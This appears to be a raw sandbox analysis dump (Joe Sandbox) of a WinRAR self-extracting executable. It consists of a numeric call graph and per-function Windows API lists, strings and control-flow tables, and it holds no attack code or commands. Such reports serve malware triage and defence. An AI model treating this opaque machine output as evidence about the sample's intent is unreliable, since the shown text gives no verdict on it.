873e72 22769->22773 22770 873a20 90 API calls 22770->22773 22771 871980 22771->22762 22774 871da1 22771->22774 22773->22770 22773->22771 22786 87f8f2 22773->22786 22775 871dab __EH_prolog 22774->22775 22794 873aa3 22775->22794 22777 871dd4 22778 871705 69 API calls 22777->22778 22780 871e5b 22777->22780 22779 871deb 22778->22779 22824 87187c 69 API calls 22779->22824 22780->22762 22782 871e03 22784 871e0f 22782->22784 22825 8806e9 MultiByteToWideChar 22782->22825 22826 87187c 69 API calls 22784->22826 22787 87f8f9 22786->22787 22788 87f914 22787->22788 22792 876dce RaiseException Concurrency::cancel_current_task 22787->22792 22790 87f925 SetThreadExecutionState 22788->22790 22793 876dce RaiseException Concurrency::cancel_current_task 22788->22793 22790->22773 22792->22788 22793->22790 22795 873aad __EH_prolog 22794->22795 22796 873ac3 22795->22796 22797 873adf 22795->22797 22863 876d0d 67 API calls 22796->22863 22799 873d1f 22797->22799 22802 873b0b 22797->22802 22882 876d0d 67 API calls 22799->22882 22801 873ace 22801->22777 22802->22801 22827 880be0 22802->22827 22804 873b43 22831 881fa9 22804->22831 22806 873b8c 22807 873c17 22806->22807 22823 873b83 22806->22823 22866 87c57d 22806->22866 22844 87a6a9 22807->22844 22808 873b88 22808->22806 22865 871fb8 69 API calls 22808->22865 22810 873b5a 22810->22806 22810->22808 22811 873b78 22810->22811 22864 876d0d 67 API calls 22811->22864 22813 873c2a 22817 873ca5 22813->22817 22818 873c9b 22813->22818 22872 881c40 22817->22872 22848 8790d0 22818->22848 22821 873ca3 22821->22823 22881 871f18 67 API calls 22821->22881 22859 880e21 22823->22859 22824->22782 22825->22784 22826->22780 22828 880bea __EH_prolog 22827->22828 22883 87fb02 22828->22883 22830 880cea 22830->22804 22832 881fb8 22831->22832 22834 881fc2 22831->22834 22902 876e0b 68 API calls 22832->22902 22835 882002 22834->22835 22837 882007 ___std_exception_copy 22834->22837 22843 882060 ___scrt_get_show_window_mode 22834->22843 22904 8900ca RaiseException 22835->22904 22838 882117 22837->22838 22839 88203c 22837->22839 22837->22843 22905 8900ca RaiseException 22838->22905 22903 881eca 68 API calls 3 library calls 22839->22903 22841 88213a 22843->22810 22845 87a6b6 22844->22845 22847 87a6c0 22844->22847 22846 88cdae new 8 API calls 22845->22846 22846->22847 22847->22813 22849 8790da __EH_prolog 22848->22849 22906 877c6b 22849->22906 22852 87135c 69 API calls 22853 8790ec 22852->22853 22909 87c658 22853->22909 22855 879146 22855->22821 22856 8790fe 22856->22855 22857 87c658 115 API calls 22856->22857 22918 87c810 91 API calls __vswprintf_c_l 22856->22918 22857->22856 22860 880e43 22859->22860 22928 87fc30 22860->22928 22862 880e5c 22862->22801 22863->22801 22864->22823 22865->22806 22867 87c5b0 22866->22867 22868 87c59e 22866->22868 22870 876195 73 API calls 22867->22870 22944 876195 22868->22944 22871 87c5a8 22870->22871 22871->22807 22873 881c49 22872->22873 22874 881c72 22872->22874 22875 881c66 22873->22875 22877 881c68 22873->22877 22879 881c5e 22873->22879 22874->22875 22979 88421d 120 API calls 2 library calls 22874->22979 22875->22821 22978 884f35 115 API calls 22877->22978 22965 885984 22879->22965 22881->22823 22882->22801 22899 88cdf0 22883->22899 22885 87fb0c EnterCriticalSection 22886 87fb4e 22885->22886 22887 87fb30 22885->22887 22889 87fb66 22886->22889 22890 87fb95 LeaveCriticalSection 22886->22890 22888 88cdae new 8 API calls 22887->22888 22892 87fb3a 22888->22892 22893 88cdae new 8 API calls 22889->22893 22891 87fba1 22890->22891 22891->22830 22892->22886 22900 87f930 71 API calls 22892->22900 22894 87fb70 22893->22894 22896 87fb8a LeaveCriticalSection 22894->22896 22901 87f930 71 API calls 22894->22901 22896->22891 22898 87fb88 22898->22896 22899->22885 22900->22886 22901->22898 22902->22834 22903->22843 22904->22838 22905->22841 22919 87a8e0 22906->22919 22914 87c66d __vswprintf_c_l 22909->22914 22910 87c7b7 22911 87c7df 22910->22911 22922 87c5f7 22910->22922 22913 87f8f2 2 API calls 22911->22913 22916 87c7ae 22913->22916 22914->22910 22914->22916 22926 87a791 85 API calls 22914->22926 22927 8877e7 93 API calls 22914->22927 22916->22856 22918->22856 22920 87a8f4 GetVersionExW 22919->22920 22921 877c70 22919->22921 22920->22921 22921->22852 22923 87c651 22922->22923 22924 87c600 22922->22924 22923->22911 22924->22923 22925 880680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 22924->22925 22925->22923 22926->22914 22927->22914 22929 87fca2 22928->22929 22930 87fc39 EnterCriticalSection 22928->22930 22929->22862 22934 87fc57 22930->22934 22936 87fc75 22930->22936 22931 87f9d1 77 API calls 22933 87fc8f 22931->22933 22932 87fc98 LeaveCriticalSection 22932->22929 22933->22932 22934->22936 22937 87f9d1 22934->22937 22936->22931 22936->22932 22938 87fdc9 72 API calls 22937->22938 22939 87f9f3 ReleaseSemaphore 22938->22939 22940 87fa13 22939->22940 22941 87fa31 DeleteCriticalSection FindCloseChangeNotification CloseHandle 22939->22941 22942 87fac7 70 API calls 22940->22942 22941->22936 22943 87fa1d CloseHandle 22942->22943 22943->22940 22943->22941 22945 8761b4 22944->22945 22954 876230 22944->22954 22946 87de7c 73 API calls 22945->22946 22945->22954 22947 8761dc 22946->22947 22955 880905 WideCharToMultiByte 22947->22955 22949 8761ef 22950 8761f4 22949->22950 22951 876232 22949->22951 22950->22954 22956 876564 22950->22956 22964 87627d 73 API calls 2 library calls 22951->22964 22954->22871 22955->22949 22958 876581 _memcmp 22956->22958 22963 8766d0 __vswprintf_c_l ___scrt_get_show_window_mode 22956->22963 22957 87ddfb 73 API calls 22957->22958 22958->22957 22959 87676a __vswprintf_c_l 22958->22959 22961 8765d4 __vswprintf_c_l _strlen 22958->22961 22960 87df34 73 API calls 22959->22960 22960->22963 22962 87df34 73 API calls 22961->22962 22962->22963 22963->22954 22964->22954 22980 8821e6 22965->22980 22967 87c658 115 API calls 22968 885995 ___BuildCatchObject __vswprintf_c_l 22967->22968 22968->22967 22969 885d67 22968->22969 22984 87fa67 22968->22984 22990 882b3a 115 API calls 22968->22990 22991 885db9 115 API calls 22968->22991 22992 87fdc9 22968->22992 22996 882593 92 API calls __vswprintf_c_l 22968->22996 22997 8863f2 120 API calls __vswprintf_c_l 22968->22997 22998 883ef1 92 API calls __vswprintf_c_l 22969->22998 22971 885d77 __vswprintf_c_l 22971->22875 22978->22875 22979->22875 22982 8821f0 ___std_exception_copy __EH_prolog ___scrt_get_show_window_mode 22980->22982 22981 8822db 22981->22968 22982->22981 22983 876e0b 68 API calls 22982->22983 22983->22982 22985 87fa73 22984->22985 22988 87fa78 22984->22988 22986 87fbb1 77 API calls 22985->22986 22986->22988 22987 87fa91 22987->22968 22988->22987 22989 87fdc9 72 API calls 22988->22989 22989->22987 22990->22968 22991->22968 22993 87fde3 ResetEvent ReleaseSemaphore 22992->22993 22994 87fe0e 22992->22994 22995 87fac7 70 API calls 22993->22995 22994->22968 22995->22994 22996->22968 22997->22968 22998->22971 22999->22613 23000->22613 23001->22609 23003 875da6 23002->23003 23052 875cc5 23003->23052 23005 875e11 23005->22625 23006 875dd9 23006->23005 23008 875e1a 23006->23008 23057 87a950 CharUpperW CompareStringW CompareStringW 23006->23057 23008->23005 23058 87f0e1 CompareStringW 23008->23058 23012 878116 23010->23012 23011 8781b7 CharUpperW 23013 8781ca 23011->23013 23012->23011 23013->22628 23015 877c20 23014->23015 23016 877c60 23015->23016 23064 876f49 67 API calls 23015->23064 23016->22635 23018 877c58 23065 876d0d 67 API calls 23018->23065 23066 879897 23020->23066 23023 879888 23023->22663 23026 879a23 23025->23026 23029 879a32 23025->23029 23027 879a29 FlushFileBuffers 23026->23027 23026->23029 23027->23029 23028 879aab SetFileTime 23028->22692 23029->23028 23030->22617 23031->22619 23032->22648 23033->22635 23034->22635 23035->22633 23036->22650 23037->22642 23038->22650 23040 879723 GetFileType 23039->23040 23041 879720 23039->23041 23042 879731 23040->23042 23041->22657 23042->22657 23043->22660 23044->22662 23045->22688 23046->22688 23047->22688 23048->22688 23049->22686 23050->22687 23051->22641 23059 875bc2 23052->23059 23054 875ce6 23054->23006 23056 875bc2 3 API calls 23056->23054 23057->23006 23058->23005 23062 875bcc 23059->23062 23060 875cb4 23060->23054 23060->23056 23062->23060 23063 87a950 CharUpperW CompareStringW CompareStringW 23062->23063 23063->23062 23064->23018 23065->23016 23067 87987d 23066->23067 23070 8798a3 23066->23070 23067->23023 23071 879b6a SetEndOfFile 23067->23071 23068 8798da SetFilePointer 23068->23067 23069 8798f8 GetLastError 23068->23069 23069->23067 23070->23068 23071->23023 23074 87a27d 23073->23074 23075 87a30d FindNextFileW 23074->23075 23076 87a29b FindFirstFileW 23074->23076 23077 87a32c 23075->23077 23078 87a318 GetLastError 23075->23078 23079 87a2b4 23076->23079 23084 87a2f1 23076->23084 23077->23084 23078->23077 23080 87b275 2 API calls 23079->23080 23081 87a2cd 23080->23081 23082 87a2e6 GetLastError 23081->23082 23083 87a2d1 FindFirstFileW 23081->23083 23082->23084 23083->23082 23083->23084 23084->22567 23094 888adf GetDC GetDeviceCaps ReleaseDC 23085->23094 23087 888ad3 23087->22260 23087->22261 23088 888ac7 23088->23087 23095 888b22 GetDC GetDeviceCaps ReleaseDC 23088->23095 23090->22264 23091->22270 23092->22270 23093->22273 23094->23088 23095->23087 23096->22281 23098 879ba2 67 API calls 23097->23098 23099 871ee9 23098->23099 23100 871eed 23099->23100 23101 8719b1 90 API calls 23099->23101 23100->22289 23100->22290 23102 871efa 23101->23102 23102->23100 23104 876d0d 67 API calls 23102->23104 23104->23100 23106 87df04 __vswprintf_c_l 23105->23106 23109 87df34 23106->23109 23110 87df40 23109->23110 23111 87df4a 23109->23111 23119 87deb5 23110->23119 23113 87dfb4 GetCurrentProcessId 23111->23113 23114 87df6a 23111->23114 23115 87df2e 23113->23115 23114->23115 23125 876dd3 67 API calls __vswprintf_c_l 23114->23125 23115->22299 23117 87df85 ___InternalCxxFrameHandler 23126 876dce RaiseException Concurrency::cancel_current_task 23117->23126 23120 87deed 23119->23120 23121 87debe 23119->23121 23120->23111 23127 87f309 23121->23127 23124 87dece GetProcAddress GetProcAddress 23124->23120 23125->23117 23126->23115 23128 88cec0 23127->23128 23129 87f316 GetSystemDirectoryW 23128->23129 23130 87f32e 23129->23130 23131 87dec8 23129->23131 23132 87f33f LoadLibraryW 23130->23132 23131->23120 23131->23124 23132->23131 24031 891b40 5 API calls 2 library calls 24003 889646 92 API calls 23201 88cd5c 23202 88cd66 23201->23202 23203 88cabc ___delayLoadHelper2@8 19 API calls 23202->23203 23204 88cd73 23203->23204 23971 88995f 104 API calls 23972 88955f 71 API calls 23947 87605e 73 API calls 23973 88d553 46 API calls 6 library calls 23949 871067 75 API calls pre_c_initialization 24032 891f60 RtlUnwind 23974 888963 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24033 88d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24034 89d774 IsProcessorFeaturePresent 23846 88b077 23848 88b07c 23846->23848 23859 88aa99 _wcsrchr 23846->23859 23848->23859 23871 88b9aa 23848->23871 23850 88b642 23852 88ad86 SetWindowTextW 23852->23859 23855 8920de 22 API calls 23855->23859 23857 88ab77 SetFileAttributesW 23860 88ac32 GetFileAttributesW 23857->23860 23870 88ab6a ___scrt_get_show_window_mode 23857->23870 23859->23850 23859->23852 23859->23855 23859->23870 23894 880b12 CompareStringW 23859->23894 23895 888b8e GetCurrentDirectoryW 23859->23895 23896 87a1a9 7 API calls 23859->23896 23899 87a132 FindClose 23859->23899 23900 889844 69 API calls ___std_exception_copy 23859->23900 23901 8896ec ExpandEnvironmentStringsW 23859->23901 23862 88ac40 DeleteFileW 23860->23862 23860->23870 23862->23870 23863 88af50 GetDlgItem SetWindowTextW SendMessageW 23863->23870 23865 873f5b _swprintf 51 API calls 23867 88ac75 GetFileAttributesW 23865->23867 23866 88af92 SendMessageW 23866->23859 23868 88ac86 MoveFileW 23867->23868 23867->23870 23869 88ac9e MoveFileExW 23868->23869 23868->23870 23869->23870 23870->23857 23870->23859 23870->23860 23870->23863 23870->23865 23870->23866 23897 87b100 52 API calls 2 library calls 23870->23897 23898 87a1a9 7 API calls 23870->23898 23873 88b9b4 ___scrt_get_show_window_mode 23871->23873 23872 88bc0c 23872->23859 23873->23872 23874 88ba9f 23873->23874 23902 880b12 CompareStringW 23873->23902 23876 879dff 4 API calls 23874->23876 23877 88bab4 23876->23877 23878 88bad3 ShellExecuteExW 23877->23878 23903 87ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23877->23903 23878->23872 23883 88bae6 23878->23883 23880 88bacb 23880->23878 23881 88bb21 23904 88be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23881->23904 23882 88bb77 CloseHandle 23884 88bb90 23882->23884 23885 88bb85 23882->23885 23883->23881 23883->23882 23886 88bb1b ShowWindow 23883->23886 23884->23872 23890 88bc07 ShowWindow 23884->23890 23905 880b12 CompareStringW 23885->23905 23886->23881 23889 88bb39 23889->23882 23891 88bb4c GetExitCodeProcess 23889->23891 23890->23872 23891->23882 23892 88bb5f 23891->23892 23892->23882 23894->23859 23895->23859 23896->23859 23897->23870 23898->23870 23899->23859 23900->23859 23901->23859 23902->23874 23903->23880 23904->23889 23905->23884

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0087F353: GetModuleHandleW.KERNEL32 ref: 0087F36B
                                                • Part of subcall function 0087F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0087F383
                                                • Part of subcall function 0087F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087F3A6
                                                • Part of subcall function 00888B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00888B96
                                                • Part of subcall function 00889036: OleInitialize.OLE32(00000000), ref: 0088904F
                                                • Part of subcall function 00889036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00889086
                                                • Part of subcall function 00889036: SHGetMalloc.SHELL32(008B20E8), ref: 00889090
                                                • Part of subcall function 00880722: GetCPInfo.KERNEL32(00000000,?), ref: 00880733
                                                • Part of subcall function 00880722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00880747
                                              • GetCommandLineW.KERNEL32 ref: 0088C179
                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088C1A0
                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088C1B1
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0088C1EB
                                                • Part of subcall function 0088BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088BE20
                                                • Part of subcall function 0088BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088BE5C
                                              • CloseHandle.KERNEL32(00000000), ref: 0088C1F4
                                              • GetModuleFileNameW.KERNEL32(00000000,008C7938,00000800), ref: 0088C20F
                                              • SetEnvironmentVariableW.KERNEL32(sfxname,008C7938), ref: 0088C221
                                              • GetLocalTime.KERNEL32(?), ref: 0088C228
                                              • _swprintf.LIBCMT ref: 0088C267
                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088C279
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0088C27C
                                              • LoadIconW.USER32(00000000,00000064), ref: 0088C293
                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0088C2E4
                                              • Sleep.KERNEL32(?), ref: 0088C312
                                              • DeleteObject.GDI32 ref: 0088C351
                                              • DeleteObject.GDI32(?), ref: 0088C35D
                                                • Part of subcall function 0088A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0088A92C
                                                • Part of subcall function 0088A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0088A953
                                              • CloseHandle.KERNEL32 ref: 0088C39C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                              • API String ID: 985665271-3710569615
                                              • Opcode ID: a3c688c7fc75de1ba3cc6000023eec2717be155e02c99514cb918d5769d37d9f
                                              • Instruction ID: 51deee4c63a508f772bde9c4278b2135ad9ed4f8392f0a6aa5bafc6b51d0f0bf
                                              • Opcode Fuzzy Hash: a3c688c7fc75de1ba3cc6000023eec2717be155e02c99514cb918d5769d37d9f
                                              • Instruction Fuzzy Hash: E161E371904310AFE320BB69EC49F6B3BE8FB49751F044429F544D36A2EB789805CBB2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 439 888bd0-888beb FindResourceW 440 888bf1-888c03 SizeofResource 439->440 441 888cc6-888cc8 439->441 442 888c23-888c25 440->442 443 888c05-888c14 LoadResource 440->443 445 888cc5 442->445 443->442 444 888c16-888c21 LockResource 443->444 444->442 446 888c2a-888c3f GlobalAlloc 444->446 445->441 447 888cbf-888cc4 446->447 448 888c41-888c4a GlobalLock 446->448 447->445 449 888cb8-888cb9 GlobalFree 448->449 450 888c4c-888c6a call 88e000 448->450 449->447 454 888c6c-888c84 call 888b65 450->454 455 888cb1-888cb2 GlobalUnlock 450->455 454->455 459 888c86-888c8e 454->459 455->449 460 888ca9-888cad 459->460 461 888c90-888ca4 GdipCreateHBITMAPFromBitmap 459->461 460->455 461->460 462 888ca6 461->462 462->460
                                              APIs
                                              • FindResourceW.KERNELBASE(00000066,PNG,?,?,00889AC8,00000066), ref: 00888BE1
                                              • SizeofResource.KERNEL32(00000000,751E5780,?,?,00889AC8,00000066), ref: 00888BF9
                                              • LoadResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C0C
                                              • LockResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C17
                                              • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00889AC8,00000066), ref: 00888C35
                                              • GlobalLock.KERNEL32(00000000,?,?,?,00889AC8,00000066), ref: 00888C42
                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00888C9D
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00888CB2
                                              • GlobalFree.KERNEL32(00000000), ref: 00888CB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                              • String ID: PNG
                                              • API String ID: 4097654274-364855578
                                              • Opcode ID: 03d9eb6a713a02cbc3fca7571fd61771e812cb3d4a540e96c1adeb407954ba5b
                                              • Instruction ID: 127699b3b6247c5ecde0a2c41533a8ada9ac1cd10b78531a28f57a0291fe92cc
                                              • Opcode Fuzzy Hash: 03d9eb6a713a02cbc3fca7571fd61771e812cb3d4a540e96c1adeb407954ba5b
                                              • Instruction Fuzzy Hash: FF216F71602602EFE761AF21DD4996BBBA9FF8A791B000528F845C2664EF31DC04DBB1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 705 87a273-87a299 call 88cec0 708 87a30d-87a316 FindNextFileW 705->708 709 87a29b-87a2ae FindFirstFileW 705->709 710 87a32c-87a32e 708->710 711 87a318-87a326 GetLastError 708->711 712 87a334-87a3dd call 87f10e call 87b902 call 8801c1 * 3 709->712 713 87a2b4-87a2cf call 87b275 709->713 710->712 714 87a3e2-87a3f5 710->714 711->710 712->714 720 87a2e6-87a2ef GetLastError 713->720 721 87a2d1-87a2e4 FindFirstFileW 713->721 723 87a2f1-87a2f4 720->723 724 87a300 720->724 721->712 721->720 723->724 726 87a2f6-87a2f9 723->726 727 87a302-87a308 724->727 726->724 729 87a2fb-87a2fe 726->729 727->714 729->727
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2A8
                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2DE
                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2E6
                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A30E
                                              • GetLastError.KERNEL32(?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A31A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FileFind$ErrorFirstLast$Next
                                              • String ID:
                                              • API String ID: 869497890-0
                                              • Opcode ID: 8df4775df3f355a065e27014e8a1d787e3a836bc02dd41e9ea3ef74584d84cb0
                                              • Instruction ID: d3ae55a57e08be297b23b88c56970e10a5a01cf7ac5fa08a21f0b663fc4b48bc
                                              • Opcode Fuzzy Hash: 8df4775df3f355a065e27014e8a1d787e3a836bc02dd41e9ea3ef74584d84cb0
                                              • Instruction Fuzzy Hash: 2C415175608245AFC324EF68C884ADEF7E9FB89350F004A1AF5ADD3240D774E9548B92
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894A7B
                                              • TerminateProcess.KERNEL32(00000000,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894A82
                                              • ExitProcess.KERNEL32 ref: 00894A94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 70b77aaad5bbfab04cab5839310f23d6da033135ecce8fba728acc4d91e9f556
                                              • Instruction ID: 343f0509dedf9459250f4448a254e60e1bfe330d06862efcf83a8e59c5d650b5
                                              • Opcode Fuzzy Hash: 70b77aaad5bbfab04cab5839310f23d6da033135ecce8fba728acc4d91e9f556
                                              • Instruction Fuzzy Hash: 90E0B631140918AFDF51BF68DD09E893BA9FB51391F091414F9099AA21CB36DD92CB85
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0087840E
                                              • _memcmp.LIBVCRUNTIME ref: 00878870
                                                • Part of subcall function 008780F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,008786E9,?,-00000930,?), ref: 008781BB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CharH_prologUpper_memcmp
                                              • String ID:
                                              • API String ID: 4047935103-0
                                              • Opcode ID: 950891d690957e33aad25b8920bf7c161aeb2290a3a16b7554e3d97a9dc9a5dc
                                              • Instruction ID: 1f1dd7d83af5b2fdd5017d0e1a02657476c34db3db6962b4f184e5fb841a19d8
                                              • Opcode Fuzzy Hash: 950891d690957e33aad25b8920bf7c161aeb2290a3a16b7554e3d97a9dc9a5dc
                                              • Instruction Fuzzy Hash: D172F571944185EEDF25DF64C889BE9BBA8FF11304F0880B9E95DDB14ADB30DA84CB61
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 27646c26781a14badac0986e8ee5c57c876c39f6d3edd26049b5c32271f0ecdf
                                              • Instruction ID: f562900aa78777c0af2cf400b3d4937ec96d382d3ad26850211d6a9105e10020
                                              • Opcode Fuzzy Hash: 27646c26781a14badac0986e8ee5c57c876c39f6d3edd26049b5c32271f0ecdf
                                              • Instruction Fuzzy Hash: B5D113B1A087458FDB14EF28C88479ABBE1FF95318F08056DE844DB642D334E959CB9A
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00889B54
                                                • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prologItemTextWindow
                                              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                              • API String ID: 810644672-2803697902
